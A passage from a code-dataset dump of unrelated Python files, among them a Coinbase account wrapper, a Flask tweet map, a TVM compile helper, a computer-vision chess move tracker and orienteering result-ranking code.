Either edit the judgeData.csv directly, or use the makeUsernames command.\")\n            if User.objects.filter(username=un).exists():\n                raise ValueError(\"username already exists: {}\".format(un))\n            \n            dat = {\n                \"username\": un,\n                \"first_name\": line[\"first_name\"].strip(),\n                \"last_name\": line[\"last_name\"].strip(),\n                \"password\": get_judge_pw(un)\n            }\n            \n            User.objects.create_user(**dat)\n\n\nclass Command(BaseCommand):\n\n    def handle(self, *args, **options):\n        readOneFile(os.path.join(\"miscdata\", \"judgeData.csv\"))\n        ","sub_path":"steamify/management/commands/importjudges.py","file_name":"importjudges.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"473816840","text":"'''\nAccount class: any member variables and functions related to a\nbitcoin account will go here\n'''\nimport json\nimport requests\nfrom coinbasewalletauth import CoinbaseWalletAuth\n\nclass Account():\n    def __init__(self):\n        # initialize generic api url\n        self.api_url = \"https://api.coinbase.com/v2/\"\n\n        # initial setup on instantiation\n        auth = CoinbaseWalletAuth() # call authentication class\n        req = requests.get(self.api_url + 'accounts', auth=auth)\n        output = dict(req.json())\n\n        # initial setup\n        self.acct_id = output['data'][0]['id'] \n        self.acct_name = output['data'][0]['name']\n        self.acct_balance = 0\n        self.acct_last_trans_amt = []\n        self.acct_last_trans_price = []  # get_acct_transactions() appends to this list\n\n        # this is where member variables will go\n\n    # retrieve account name\n    def get_acct_name(self):\n        return self.acct_name\n\n    # add acct id function here\n    def get_acct_id(self):\n        return self.acct_id\n\n    def get_acct_balance(self):\n        # get current balance in this form (balance, currency_type)\n        # the variables in the tuple above are string types\n        auth = CoinbaseWalletAuth()\n\n        req = requests.get(self.api_url + 'accounts', auth=auth)\n        output = dict(req.json())\n\n        curr_amount = output['data'][0]['balance']['amount']\n        curr_type = output['data'][0]['balance']['currency']\n\n        self.acct_balance = curr_amount\n\n        return self.acct_balance, curr_type\n\n    def get_acct_transactions(self):\n        account_id = self.get_acct_id()\n        auth = CoinbaseWalletAuth()\n        request_transaction = requests.get(self.api_url + \\\n                                           'accounts/' + \\\n                                           account_id + \\\n                                           '/transactions', auth=auth).json()\n        output = dict(request_transaction)\n\n        i = 0\n        trans_list = []\n        for i in range(5):\n            trans_list.append(output['data'][i])\n\n        self.acct_last_trans_price.append(output['data'][0]['amount']['amount'])\n        self.acct_last_trans_price.append(output['data'][0]['amount']['currency'])\n        self.acct_last_trans_price.append(output['data'][0]['native_amount']['amount'])\n        self.acct_last_trans_price.append(output['data'][0]['native_amount']['currency'])\n\n        return trans_list\n\n    # returns a list containing 2 k,v pairs for amount and native amt as keys\n    def get_last_trans_amt(self):\n        return self.acct_last_trans_amt\n\n    def get_last_trans_price(self):\n        return self.acct_last_trans_price\n\n","sub_path":"src/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"510143796","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport sys\nimport yaml\nimport matplotlib.pyplot as plt\n\nimport os\nimport traceback\n\n\n\ndef read_estimation_robot(test_number, est_type):\n\t# read estimation from robot\n\n\tdata = np.genfromtxt(\"./\" + test_number + \"/\"+ est_type + \"_data\" 
+ test_number + \".txt\", delimiter = \",\", skip_header=1)\n\n\tdata = data[:, [0, 2, 4, 7]] # est_time, stamp_time, d, phi\n\t#print(data[0,0]- data[1,1])\n\n\tt_est = data[:,1] / 1e9\n\tdelay = data[:,0] - data[:,1]\n\td = data[:,2]\n\tphi_est = data[:,3]\n\n\treturn(t_est, phi_est)\n\n###\n\ndef read_truth_localization(test_number):\n\n\twith open(\"./\"+test_number+\"/autobot06.yaml\", 'r') as stream:\n\n\n\t\tdata = yaml.safe_load(stream)\n\n\n\t\ttimestart = data['begin_time_stamp']\n\t\tdata_points = len(data['trajectory_data'])\n\t\t\n\t\tx = np.zeros((data_points,))\n\t\ty= np.zeros((data_points,))\n\t\tR = np.zeros((3,3, data_points)) \n\t\tphi = np.zeros((3, data_points))\n\n\t\tdx = 999.999*np.ones((data_points, ))\n\t\tdy = 999.999*np.ones((data_points, ))\n\t\tdr = 999.999*np.ones((data_points, ))\n\t\tdphi = 999.999*np.ones((data_points, ))\n\n\t\tfinal_trajectory = []\n\t\tsave_time_stamps = np.zeros((0,1))\n\t\t#print(data['trajectory_data'].items())\n\t\tfor idx, [time, traj] in enumerate(data['trajectory_data'].items()):\n\t\t\tx[idx] = np.array(traj[0])\n\t\t\ty[idx] = np.array(traj[1])\n\t\t\t\n\t\t\tsave_time_stamps = np.append(save_time_stamps, time)\n\t\t\t#print(time)\n\t\t\t\n\t\t\tR[:,:,idx] = np.reshape(np.array(traj[3:]), (3,3))\n\t\t\tphi[:,idx] = np.array([np.arctan2(-R[1,2,idx],R[2,2,idx]), \n\t\t\t\t\t\t\t\tnp.arctan2(R[0,2,idx],np.sqrt(R[0,0,idx]**2 + R[0,1,idx]**2)),\n\t\t\t\t\t\t\t\tnp.arctan2(-R[0,1,idx], R[0,0,idx])])\n\t\t\t\n\t\t\tz = phi[2,idx]\n\t\t\t#print(timestart.keys())\n\t\t\tpoints = np.array([x[idx], y[idx]])\n\t\t\tfinal_trajectory.append([points, z])\n\t\tfinal_array = final_trajectory\n\t\t\n\n\n\tx_true = np.zeros((0,1))\n\ty_true = np.zeros((0,1))\n\talpha_true = np.zeros((0,1))\n\tt_true = np.zeros((0,1))\n\n\tfor entry in range(0, len(final_array)):\n\t\tx = (final_array[entry][0][0] ) #-2.2\n\t\ty = final_array[entry][0][1] #+ 0.8\n\t\talpha = final_array[entry][1]\n\n\n\t\tx_true = np.append(x_true, x)\n\t\ty_true = np.append(y_true, y)\n\t\talpha_true = np.append(alpha_true, alpha)\n\t\tt_true = np.append(t_true, save_time_stamps[entry])\n\t\t#print(\"%s %s %s %s %s\" %(x,y,alpha, entry, save_time_stamps[entry]))\n\t\t\n\n\t#copy from notebook\n\n\treturn(t_true, timestart, x_true, y_true, alpha_true)\n\n\ndef write_to_file(test_number, est_type, mean, stdev):\n\tf = open(\"./evaluation_results.txt\", \"a\")\n\tf.write(str(test_number)+ \",\" + est_type + \",\" + str(mean) + \",\" + str(stdev)+\"\\n\")\n\n\tf.close()\n\treturn\n\n\ndef evaluate_estimation(phi_est, t_est, t_all, t_0, x, y, alpha, est_type):\n\n\ta=0.6\n\tb=2.1 #1.185\n\tphi_true = np.zeros((0,1))\n\tt_true = np.zeros((0,1))\n\tt_plot = np.zeros((0,1))\n\tmean_stdev = np.zeros((0,3))\n\tk =0\n\n\n\tfor i in range(len(t_all)):\n\n\t\tif x[i] > 1.6 and y[i] > a and y[i] < b:\n\t\t\talpha[i] -= np.sign(alpha[i]) * np.pi/2\n\n\t\t\n\t\t\tphi_true = np.append(phi_true, alpha[i])\n\t\t\tt_true = np.append(t_true, float(t_all[i]) + t_0)\n\t\t\tt_plot = np.append(t_plot, float(t_all[i]))\n\n\ti = 1\n\tprint(len(t_true))\n\twhile i < len(t_true)-2:\n\t\tphi_true[i] = 0.25 * phi_true[i-1] + 0.5 * phi_true[i] + 0.25 *phi_true[i+1]\n\t\t#phi_true[i] = (phi_true[i-1] +phi_true[i] + phi_true[i+1])/3\n\t\ti+=1\n\t#error = phi_true\n\t#plt.plot(t_true -t_true[0], phi_true, xlabel = \"a\")\n\t# plt.set_xlabel('time [s]')\n\t# plt.set_ylabel('phi_localization [rad]')\n\t#plt.savefig(\"./phi_true_push-line.png\")\n\t#print(len(phi_true))\n\n\n\tu=0\n\tphi_comp = np.zeros((0,1))\n\ti 
=0\n\twhile i < len(t_true):\n\t\tif i < len(t_true) -1:\n\n\t\t\twhile abs(phi_true[i+1] - phi_true[i]) > 0.1:\n\t\t\t\tprint(\"delete\", t_true[i+1]-t_true[0], phi_true[i+1])\n\t\t\t\tt_true = np.delete(t_true, i+1)\n\t\t\t\tphi_true = np.delete(phi_true, i+1)\n\n\n\t\t\tif t_true[i+1] - t_true[i] > 0.5:\n\t\t\t\tt_true = np.insert(t_true, i+1, 0.5 * (t_true[i+1] + t_true[i]))\n\t\t\t\tphi_true = np.insert(phi_true, i+1, 0.5 * (phi_true[i+1] + phi_true[i]))\n\t\n\t\tif t_true[i] < t_est[u]:\n\t\t\tphi_comp = np.append(phi_comp, (phi_est[u] - phi_est[u-1]) / (t_est[u] - t_est[u-1]) * (t_true[i] - t_est[u-1]) + phi_est[u-1])\n\t\t\tp = (phi_est[u] - phi_est[u-1]) / (t_est[u] - t_est[u-1]) * (t_true[i] - t_est[u-1]) + phi_est[u-1]\n\t\t\ti += 1\n\t\t\n\t\telse:\n\t\t\tu += 1\n\n\terror = phi_comp - phi_true\n\t\n\tmean = np.mean(error)\n\tstdev = np.std(error)\n\n\tprint(mean, stdev)\n\treturn(mean, stdev)\n\n\nif __name__ ==\t\"__main__\":\n\n\n\ttest_number = sys.argv[1]\n\n\tfor w in ([\"SF\", \"cam\"]):\n\t#for w in ([\"SF\"]):\n\t\tprint(w)\n\n\t\tt_est, phi_est = read_estimation_robot(test_number, w)\n\t\t#t_est, phi_est =0,0\n\t\tt_all, t_0, x, y, alpha = read_truth_localization(test_number)\n\t\t#t_all, t_0, x, y, alpha = 0,0,0,0,0\n\t\tmean, stdev = evaluate_estimation(phi_est, t_est, t_all, t_0, x, y, alpha, w)\n\n\t\twrite_to_file(test_number, w, mean, stdev)","sub_path":"eval_curve_3_straight.py","file_name":"eval_curve_3_straight.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"243510596","text":"import cv2\nimport glob\nimport os\nimport base64\nimport struct\n\n# The LUT decode format (from packed base64)\nDECODE_FORMAT = ''.join(['B'] * 256)\n\nclass Tile(object):\n\n def __init__(self, filename, tx=-1, ty=-1, tz=-1):\n '''\n '''\n self._filename = filename\n self._basename = os.path.splitext(self._filename)[0]\n self._tx = tx\n self._ty = ty\n self._tz = tz\n\n self._width = -1\n self._height = -1\n\n self._imagedata = None\n\n @property\n def id(self):\n return self._filename\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, value):\n self._width = value\n\n @property\n def height(self):\n return self._height\n\n @height.setter\n def height(self, value):\n self._height = value\n\n def load(self, directory, file_prefix='', ratio_x=1, ratio_y=1, lut_base64=None):\n '''\n '''\n\n file_path = os.path.join(directory, file_prefix + self._basename)\n file = glob.glob(file_path + '.*')[0]\n\n # this is grayscale loading with any OpenCV version\n imagedata = cv2.imread(file, 0)\n\n # Apply the look up table of the tile\n if lut_base64 is not None:\n lut = struct.unpack(DECODE_FORMAT, base64.b64decode(lut_base64))\n imagedata = cv2.LUT(imagedata, lut)\n return imagedata\n\n @staticmethod\n def from_string(string):\n '''\n Creates a new image from a string.\n '''\n\n string = string.strip() # remove some weird line break\n values = string.split() # split the string\n\n # right now we have something like this\n # ['021_000001_003_2015-01-14T1653216213670.bmp', '2189614.003',\n # '1853228.961', '0']\n\n tile = Tile(\n values[0], float(\n values[1]), float(\n values[2]), float(\n values[3]))\n # print values\n return tile\n","sub_path":"mbeam/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"243270099","text":"#!/usr/bin/python3\n\n'''\n\n215 = 32768 and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\n\nWhat is the sum of the digits of the number 21000?\n\n'''\n\n\nclass Main():\n def __init__(self):\n digits = list(str(2**1000))\n # convert string digits to integers\n digits = list(map(int, digits))\n self.answer = sum(digits)\n","sub_path":"problem0016.py","file_name":"problem0016.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455623820","text":"\"\"\"\nThis script runs the TwitterMapProj application using a development server.\n\"\"\"\n\nfrom os import environ, system\nfrom datetime import datetime\nfrom flask import render_template, jsonify, Flask\nfrom pyes import *\n\nfrom DataFetcher import DataFetcher\nfrom TweetsProcessor import TweetsProcessor\n\napplication = app = Flask(__name__)\ntweetsProcessor = None\n\ndef init_tweetsprocessor():\n global tweetsProcessor\n dataFetcher = DataFetcher()\n #tweets_dict = dataFetcher.run_all()\n dataFetcher.parse_data()\n tweets_dict = dataFetcher.get_dict()\n tweetsProcessor = TweetsProcessor(tweets_dict)\n tweetsProcessor.prepare()\n\n@app.route('/')\n@app.route('/home')\ndef home():\n \"\"\"Renders the home page.\"\"\"\n\n return render_template(\n 'mainTwitterMap.html',\n title='Main Twitter Map Page',\n year=datetime.now().year,\n )\n\n@app.route('/getTwits/')\ndef get_tweets(keywords):\n global tweetsProcessor\n tokens = keywords.split()\n words = ''\n for t in tokens[:-2]:\n words += t + ' '\n lat = float(tokens[-2])\n lng = float(tokens[-1])\n\n words = words.encode('utf-8')\n data = []\n\n results = tweetsProcessor.get_similar_tweets(words, lat, lng)\n\n for line in results:\n data.append({'longitude': line[3]['coordinates'][0], 'latitude': line[3]['coordinates'][1], 'text': line[0]})\n return jsonify({'data':data})\n\n@app.route('/refetch')\ndef refetch():\n init_tweetsprocessor()\n return jsonify({'status': 'ok'})\n\nif __name__ == '__main__':\n global tweetsProcessor\n if tweetsProcessor is None:\n init_tweetsprocessor()\n app.run(debug=True, host='0.0.0.0')\n #app.run()","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489338564","text":"# pylint: disable=too-many-arguments, E1101\n\"\"\" Module for tvm stage. 
\"\"\"\nimport torch\n\nimport tvm\nfrom tvm import relay\nfrom tvm.relay.frontend.pytorch import get_graph_input_names\nfrom tvm.contrib import graph_runtime\n\n__all__ = ['convert_model', 'compile_model', 'eval_model']\n\n\ndef convert_model(model, input_shape):\n \"\"\"\n Convert a pytorch model to tvm model.\n \"\"\"\n input_data = torch.randn(input_shape)\n scripted_model = torch.jit.trace(model, input_data).eval()\n input_name = get_graph_input_names(scripted_model)[0] # only one input\n shape_dict = {input_name: input_shape}\n mod, params = relay.frontend.from_pytorch(scripted_model, shape_dict)\n return mod, params, input_name\n\n\ndef compile_model(mod, params, target='llvm', target_host='llvm', opt_level=3):\n \"\"\"\n Compile the tvm model.\n \"\"\"\n with relay.build_config(opt_level=opt_level):\n graph, lib, params = relay.build(mod,\n target=target,\n target_host=target_host,\n params=params)\n return graph, lib, params\n\n\ndef eval_model(graph, lib, params, ctx, input_name, input_data):\n \"\"\"\n Evaluate the model with input data.\n \"\"\"\n mod = graph_runtime.create(graph, lib, ctx)\n # Set inputs\n mod.set_input(input_name, tvm.nd.array(input_data.astype('float32')))\n mod.set_input(**params)\n # Execute\n mod.run()\n # Get outputs\n tvm_output = mod.get_output(0)\n return tvm_output\n","sub_path":"sustech_nas/tvm_stage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325574417","text":"import chess\nfrom chess import pgn\nfrom chesscv import BoardDetector, show_wait_destroy\nfrom piece_classifier import train_piece_classifier, get_piece_prediction\n\nimport os\n# if this is running on a pi, then import picamera\nif os.uname()[4][:3].startswith('arm'):\n from picamera.array import PiRGBArray\n from picamera import PiCamera\nimport time\nimport cv2 as cv\nimport numpy as np\n\nclass InvalidMove(Exception):\n pass\n\ndef track_game(video, outfile):\n board_detector = BoardDetector(display=True)\n move_tracker = MoveTracker()\n\n if video is None:\n camera = PiCamera(resolution=(720,720))\n rawCapture = PiRGBArray(camera)\n time.sleep(2.0)\n camera.capture(rawCapture, format=\"bgr\")\n first_frame = rawCapture.array\n params, ps = board_detector.locate_squares(first_frame)\n move_tracker.set_square_coordinates(params, ps)\n rawCapture.truncate(0)\n for frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n frame = board_detector.transform_image(frame)\n move_tracker.process_image(frame)\n\n rawCapture.truncate(0)\n else:\n vs = cv.VideoCapture(video)\n board_found = False\n while not board_found:\n _, first_frame = vs.read()\n try:\n params, ps = board_detector.locate_squares(first_frame)\n move_tracker.set_square_coordinates(params, ps)\n move_tracker.set_first_frame(board_detector.transform_image(first_frame))\n board_found = True\n except TypeError:\n continue\n classifier_trained = False\n while (vs.isOpened()):\n ret, frame = vs.read()\n if not ret:\n break\n cv.imshow('frame', frame)\n frame = board_detector.transform_image(frame)\n if cv.waitKey(100) & 0xFF == ord('q'):\n break\n if not classifier_trained:\n move_tracker.train_piece_classifier(frame)\n classifier_trained = True\n move_tracker.process_image(frame)\n output_game_to_file(move_tracker.board, outfile)\n\ndef output_game_to_file(board, outfile):\n game = pgn.Game()\n node = None\n for move in board.move_stack:\n if node is None:\n node = 
game.add_variation(move)\n        else:\n            node = node.add_variation(move)\n    print(game, file=open(outfile, 'w'), end='\\n\\n')\n\nclass Square():\n    \"\"\"\n    object for a single square on the board\n    \"\"\"\n    def __init__(self, board_coords, image_coords):\n        self.board_coords = board_coords\n        self.image_coords = image_coords\n\n    def get_delta(self, prev_frame, curr_frame):\n        prev_image = self.get_image(prev_frame)\n        curr_image = self.get_image(curr_frame)\n        return cv.absdiff(prev_image, curr_image)\n\n    def get_image(self, image):\n        x0, x1, y0, y1 = self.image_coords\n        return image[y0:y1,x0:x1]\n\n    def display(self, image):\n        square = self.get_image(image)\n        show_wait_destroy(\"{},{}\".format(*self.board_coords), square)\n\nclass MoveTracker():\n    \"\"\"\n    Class to detect moves made on the board\n    \"\"\"\n    def __init__(self):\n        self.last_still_frame = None\n        self.prev_frame = None\n        self.board = chess.Board()\n        self.white_side = None\n\n    def process_image(self, frame):\n        #frame = cv.GaussianBlur(frame, (5, 5), 0)\n\n        if self.prev_frame is None:\n            self.prev_frame = frame\n            return\n\n        # compute the absolute difference between the previous frame and the current frame\n        frame_delta = cv.absdiff(self.prev_frame, frame)\n        first_delta = cv.absdiff(self.last_still_frame, frame)\n        if np.all(frame_delta < 40) and np.percentile(first_delta, 90) < 50: #image is still\n            #show_wait_destroy('still: {0:.2f}'.format(np.percentile(first_delta, 90)), frame)\n            # so see if the board differs from the last still board\n            move_candidates = []\n            for move in self.board.legal_moves:\n                if self.white_side is None:\n                    #first calculate as if it is left side, then right side\n                    from_square = self.get_square(move.from_square, 'left') \n                    to_square = self.get_square(move.to_square, 'left')\n                    if self.detect_move(from_square, to_square, frame):\n                        self.white_side = 'left'\n                        print(\"White side is left\")\n                        move_candidates.append(move)\n                    from_square = self.get_square(move.from_square, 'right')\n                    to_square = self.get_square(move.to_square, 'right')\n                    if self.detect_move(from_square, to_square, frame):\n                        self.white_side = 'right'\n                        print(\"White side is right\")\n                        move_candidates.append(move)\n                else:\n                    from_square = self.get_square(move.from_square)\n                    to_square = self.get_square(move.to_square)\n                    if self.detect_move(from_square, to_square, frame):\n                        move_candidates.append(move)\n            move_made = None\n            if len(move_candidates) == 1:\n                move_made = move_candidates[0]\n            elif len(move_candidates) > 1:\n                move_made = self.check_for_castle(move_candidates)\n                if not move_made:\n                    move_made = self.filter_multiple_moves(move_candidates, frame)\n                if not move_made: \n                    import pdb; pdb.set_trace()\n            if move_made is not None:\n                self.board.push(move_made)\n                print(self.board)\n                print('-' * 50)\n                show_wait_destroy(move_made.uci(), frame)\n            self.last_still_frame = frame\n        self.prev_frame = frame\n\n    def check_for_castle(self, move_candidates):\n        if self.board.turn == chess.WHITE:\n            if chess.Move.from_uci('e1g1') in move_candidates:\n                return chess.Move.from_uci('e1g1')\n            elif chess.Move.from_uci('e1c1') in move_candidates:\n                return chess.Move.from_uci('e1c1')\n        else:\n            if chess.Move.from_uci('e8g8') in move_candidates:\n                return chess.Move.from_uci('e8g8')\n            elif chess.Move.from_uci('e8c8') in move_candidates:\n                return chess.Move.from_uci('e8c8')\n        return None\n\n    def detect_move(self, from_square, to_square, frame):\n        from_pred = self.get_piece_prediction(from_square.get_image(frame))\n        to_pred = self.get_piece_prediction(to_square.get_image(frame))\n        from_delta = 
from_square.get_delta(self.last_still_frame, frame)\n        to_delta = to_square.get_delta(self.last_still_frame, frame)\n        if np.median(from_delta) < 15 or np.median(to_delta) < 15:\n            return False\n        if np.median(from_delta) > 30 and np.median(to_delta) > 30:\n            return True\n        if from_pred < -2 and to_pred > 0:\n#            cv.imshow('from_curr: {0:.3f}'.format(from_pred), from_square.get_image(frame))\n#            show_wait_destroy('to_curr: {0:.3f}'.format(to_pred), to_square.get_image(frame))\n            return True\n        # if the from square definitely doesn't have a piece, then take a closer look at\n        # the to squares\n        elif from_pred < -3: \n            print(\"Taking a closer look at to_square\")\n            to_pred = self.get_piece_prediction(to_square.get_image(frame), True)\n            cv.imshow('from_curr: {0:.3f}'.format(from_pred), from_square.get_image(frame))\n            show_wait_destroy('to_curr: {0:.3f}'.format(to_pred), to_square.get_image(frame))\n            if to_pred > 0 and np.median(to_delta) > 25:\n                return True\n        return False\n\n    def filter_multiple_moves(self, move_candidates, frame):\n        # if all moves have the same from_square, then just look at the to squares\n        if np.all([m.from_square == move_candidates[0].from_square for m in move_candidates]):\n            deltas = []\n            for move in move_candidates:\n                to_square = self.get_square(move.to_square)\n                to_delta = to_square.get_delta(self.last_still_frame, frame)\n                deltas.append(np.median(to_delta))\n            # if one delta median is 2x greater than the rest, then choose that one\n            if np.all([np.max(deltas) > 2*d for i, d in enumerate(deltas) if i != np.argmax(deltas)]):\n                return move_candidates[np.argmax(deltas)]\n\n    def get_square(self, square_id, side=None):\n        if side is None:\n            side = self.white_side\n        if side == 'left':\n            return self.squares[square_id]\n        else:\n            return self.squares[63 - square_id]\n\n    def set_square_coordinates(self, params, perspective_shift):\n        self.squares = []\n        x, y, s = params\n        p0 = perspective_shift[0]\n        for i in range(8):\n            p_i = min(i, 7-i)\n            lo_shift = -perspective_shift[p_i] if i < 4 else perspective_shift[p_i + 1]\n            hi_shift = -perspective_shift[p_i + 1] if i < 4 else perspective_shift[p_i]\n            x_lo = i * s + lo_shift + p0\n            x_hi = (i + 1) * s + hi_shift + p0\n            for j in range(8):\n                p_j = min(j, 7-j)\n                lo_shift = -perspective_shift[p_j] if j < 4 else perspective_shift[p_j + 1]\n                hi_shift = -perspective_shift[p_j + 1] if j < 4 else perspective_shift[p_j]\n                y_lo = j * s + lo_shift + p0\n                y_hi = (j + 1) * s + hi_shift + p0\n                self.squares.append(Square((i, j), (x_lo, x_hi, y_lo, y_hi)))\n\n    def set_first_frame(self, frame):\n        self.last_still_frame = frame\n    \n    def train_piece_classifier(self, frame):\n        images = []\n        labels = []\n        for i, square in enumerate(self.squares):\n            try:\n                image = cv.resize(square.get_image(frame), (32, 32), interpolation=cv.INTER_AREA)\n            except:\n                import pdb; pdb.set_trace()\n            image = image/255\n            label = 1 if i < 16 or i > 47 else 0\n            for image in generate_transformations(image):\n                images.append(image)\n                labels.append(label)\n        images = np.array(images)\n        images = images.reshape(-1, 1, 32, 32)\n        labels = np.array(labels)\n        labels = labels.reshape(-1, 1)\n        self.piece_classifier = train_piece_classifier(images, labels)\n\n    def get_piece_prediction(self, orig_image, transform = False):\n        image = np.copy(orig_image)\n        image = cv.resize(image, (32, 32), interpolation=cv.INTER_AREA)\n        image = image/255\n        if transform:\n            preds = []\n            for image in generate_transformations(image, True):\n                image = image.reshape(1, 1, 32, 32)\n                
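# Test-time augmentation: each rotated/flipped/rolled copy of the square is scored and the most confident prediction is kept (np.max over preds below).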
preds.append(get_piece_prediction(self.piece_classifier, image))\n return np.max(preds)\n else:\n image = image.reshape(1, 1, 32, 32)\n return get_piece_prediction(self.piece_classifier, image)\n\ndef generate_transformations(image, roll=False):\n \"\"\" function to make mirror and rotation transformations \"\"\"\n for j in range(4):\n new_image = np.copy(image)\n rotation_matrix = cv.getRotationMatrix2D((16, 16), j * 90, 1.0)\n new_image = cv.warpAffine(new_image, rotation_matrix, (32, 32))\n yield new_image\n new_image = np.copy(image)\n new_image = cv.flip(new_image, 0)\n for j in range(4):\n new_image = np.copy(new_image)\n rotation_matrix = cv.getRotationMatrix2D((16, 16), j * 90, 1.0)\n new_image = cv.warpAffine(new_image, rotation_matrix, (32, 32))\n yield new_image\n if roll:\n for i in range(6):\n new_image = np.copy(image)\n new_image = np.roll(new_image, i, 0)\n for j in range(6):\n new_image = np.roll(new_image, j, 1)\n yield new_image\n \n\nif __name__ == \"__main__\":\n import argparse\n \n parser = argparse.ArgumentParser(description='Track a chess game over a live board')\n parser.add_argument('-v', '--video', dest='video', default=None, help='path to video file')\n parser.add_argument('-o', '--outfile', dest='outfile', default=\"./game.pgn\"\n , help='path to output pgn file')\n\n args = parser.parse_args()\n\n track_game(args.video, args.outfile)\n\n\n","sub_path":"game_tracker.py","file_name":"game_tracker.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369452919","text":"import logging\n\nfrom sportorg.core.otime import OTime\nfrom sportorg.language import _\nfrom sportorg.models.memory import race, Result, Person, ResultStatus, Course, Group, Qualification, RankingItem, \\\n RelayTeam, RaceType\nfrom sportorg.models.result.result_checker import find_course\nfrom sportorg.utils.time import time_to_hhmmss\n\n\n# FIXME: does not work sorting\nclass ResultCalculation(object):\n def process_results(self):\n logging.debug('Process results')\n self.set_times()\n race().relay_teams.clear()\n for i in race().groups:\n if not i.get_type() == RaceType.RELAY:\n # single race\n array = self.get_group_finishes(i)\n self.set_places(array)\n self.set_rank(i)\n else:\n # relay\n new_relays = self.process_relay_results(i)\n race().relay_teams.append(new_relays)\n\n def set_times(self):\n for i in race().results:\n assert isinstance(i, Result)\n i.result = i.get_result_for_sort()\n\n @staticmethod\n def get_group_finishes(group):\n ret = []\n for i in race().results:\n assert isinstance(i, Result)\n person = i.person\n if person:\n assert isinstance(person, Person)\n if person.group == group:\n ret.append(i)\n ret.sort()\n group.count_finished = len(ret)\n return ret\n\n @staticmethod\n def get_group_persons(group):\n assert isinstance(group, Group)\n ret = []\n for i in race().persons:\n person = i\n assert isinstance(person, Person)\n if person.group == group:\n ret.append(i)\n group.count_person = len(ret)\n return ret\n\n def set_places(self, array):\n assert isinstance(array, list)\n current_place = 1\n last_place = 1\n last_result = 0\n for i in range(len(array)):\n res = array[i]\n assert isinstance(res, Result)\n\n res.place = ''\n # give place only if status = OK\n if res.status == ResultStatus.OK:\n # skip if out of competition\n if res.person.is_out_of_competition:\n res.place = _('o/c')\n continue\n\n # the same place processing\n if current_place == 1 or res.result != 
last_result:\n # result differs from previous - give next place\n last_result = res.result\n last_place = current_place\n\n res.place = last_place\n current_place += 1\n\n def process_relay_results(self, group):\n if group and isinstance(group, Group):\n results = self.get_group_finishes(group)\n\n relay_teams = {}\n for res in results:\n assert isinstance(res, Result)\n bib = res.person.bib\n\n team_number = bib % 1000\n if not str(team_number) in relay_teams:\n new_team = RelayTeam()\n new_team.group = group\n new_team.bib_number = team_number\n relay_teams[str(team_number)] = new_team\n\n team = relay_teams[str(team_number)]\n assert isinstance(team, RelayTeam)\n team.add_result(res)\n teams_sorted = sorted(relay_teams.values())\n place = 1\n for cur_team in teams_sorted:\n cur_team.set_place(place)\n place += 1\n\n return relay_teams.values()\n\n def set_rank(self, group):\n assert isinstance(group, Group)\n ranking = group.ranking\n results = self.get_group_finishes(group)\n\n # initial turning off, for disabling ranking\n for i in results:\n i.assigned_rank = Qualification.NOT_QUALIFIED\n\n if ranking.is_active:\n rank = self.get_group_rank(group)\n ranking.rank_scores = rank\n if rank > 0:\n leader_result = results[0]\n assert isinstance(leader_result, Result)\n leader_time = leader_result.get_result_otime()\n for i in ranking.rank.values():\n assert isinstance(i, RankingItem)\n if i.is_active and i.use_scores:\n i.max_time = self.get_time_for_rank(leader_time, i.qual, rank)\n i.percent = self.get_percent_for_rank(i.qual, rank)\n\n # Rank assigning for all athletes\n for i in results:\n assert isinstance(i, Result)\n result_time = i.get_result_otime()\n place = i.place\n\n if i.person.is_out_of_competition or i.status != ResultStatus.OK:\n continue\n\n qual_list = sorted(ranking.rank.values(), reverse=True, key=lambda item: item.qual.get_scores())\n for j in qual_list:\n assert isinstance(j, RankingItem)\n if j.is_active:\n if isinstance(place, int) and j.max_place >= place:\n i.assigned_rank = j.qual\n break\n if j.max_time and j.max_time >= result_time:\n i.assigned_rank = j.qual\n break\n\n def get_group_rank(self, group):\n \"\"\"\n Rank calculation, takes sums or scores from qualification of best 10 athletes, who have OK result and not o/c\n :param group:\n :return: rank of group, -1 if we have < 10 successfull results\n \"\"\"\n scores = []\n array = self.get_group_finishes(group)\n\n if len(array) < 10:\n # less than 10 started\n return -1\n\n for i in array:\n assert isinstance(i, Result)\n if i.status == ResultStatus.OK:\n person = i.person\n if not person.is_out_of_competition:\n qual = person.qual\n scores.append(qual.get_scores())\n\n if len(scores) < 5:\n # less than 5 finished and not disqualified\n return -1\n\n if len(scores) <= 10:\n # get rank sum of 10 best finished\n return sum(scores)\n\n scores = sorted(scores)\n return sum(scores[-10:])\n\n def get_percent_for_rank(self, qual, rank):\n table = []\n if qual == Qualification.I:\n table = [\n (1000, 136),\n (850, 133),\n (750, 130),\n (650, 127),\n (500, 124),\n (425, 121),\n (375, 118),\n (325, 115),\n (250, 112),\n (211, 109),\n (185, 106),\n (159, 103),\n (120, 100)\n ]\n elif qual == Qualification.II:\n table = [\n (1000, 151),\n (850, 148),\n (750, 145),\n (650, 142),\n (500, 139),\n (425, 136),\n (375, 133),\n (325, 130),\n (250, 127),\n (211, 124),\n (185, 121),\n (159, 118),\n (120, 115),\n (102, 112),\n (90, 109),\n (78, 106),\n (60, 103),\n (51, 100)\n ]\n elif 